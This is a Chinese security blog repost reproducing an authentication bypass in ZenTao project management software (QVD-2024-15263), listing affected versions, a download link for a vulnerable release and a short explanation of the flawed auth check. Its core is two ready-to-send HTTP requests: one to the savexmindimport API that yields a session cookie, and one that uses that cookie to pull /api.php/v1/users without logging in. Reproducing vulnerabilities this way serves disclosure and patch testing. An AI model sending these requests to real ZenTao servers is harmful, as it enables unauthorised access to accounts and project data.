禅道身份认证绕过漏洞 QVD-2024-15263

admin 2024年4月28日07:47:49评论150 views字数 1793阅读5分58秒阅读模式

 

禅道 项目管理软件 是国产的开源免费项目管理软件,专注研发项目管理,内置需求管理、任务管理、bug管理、缺陷管理、用例管理、计划发布等功能,实现了软件的完整生命周期管理及全面支持IPD管理流程。

开发语言:PHP开发厂商:https://www.zentao.net/

禅道身份认证绕过漏洞 QVD-2024-15263

空间测绘

回复“20240427”获取空间测绘语句

漏洞描述

禅道系统某些API设计为通过特定的鉴权函数进行验证,但在实际实现中,这个鉴权函数在鉴权失败后并不中断请求,而是仅返回一个错误标志,这个返回值在后续没有被适当处理。此外,该系统在处理某些API时未能有效检查用户身份,允许未认证的用户执行某些操作,从而绕过鉴权机制。

影响版本

v16.xzentao < v18.12 (开源版)v6.xzentao < v8.12 (企业版)v3.xzentao < v4.12 (旗舰版)

环境搭建

官网下载源代码部署即可。

https://dl.zentao.net/zentao/18.11/ZenTaoPMS-18.11-php7.0.tar.xz

漏洞利用

1.获取cookie。

GET /api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1Host: xxx.xxx.xxxUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9sec-ch-ua-platform: "Windows"sec-ch-ua: "Google Chrome";v="109", "Chromium";v="109", "Not=A?Brand";v="24"sec-ch-ua-mobile: ?0Connection: close

禅道身份认证绕过漏洞 QVD-2024-15263

2.然后设置cookie发包,回显下图内容代表漏洞存在。

GET /api.php/v1/users HTTP/1.1Host: xxx.xxx.xxxUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: zentaosid=dt3g72v4k8qmt0a5fqbqh9tp00x-requested-with: XMLHttpRequestConnection: close

禅道身份认证绕过漏洞 QVD-2024-15263

一键利用

禅道身份认证绕过漏洞 QVD-2024-15263

禅道身份认证绕过漏洞 QVD-2024-15263

参考链接

https://mp.weixin.qq.com/s/qyqP6k6vaQRflnue95w61Ahttps://mp.weixin.qq.com/s/F6EorG4kuNLeD1-BSg_plQhttps://mp.weixin.qq.com/s/hi3vy3atKUGzlV9Mq8yKVg

 

原文始发于微信公众号(不够安全):[漏洞复现] 禅道身份认证绕过漏洞 QVD-2024-15263

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月28日07:47:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   禅道身份认证绕过漏洞 QVD-2024-15263https://cn-sec.com/archives/2692227.html

发表评论

匿名网友 填写信息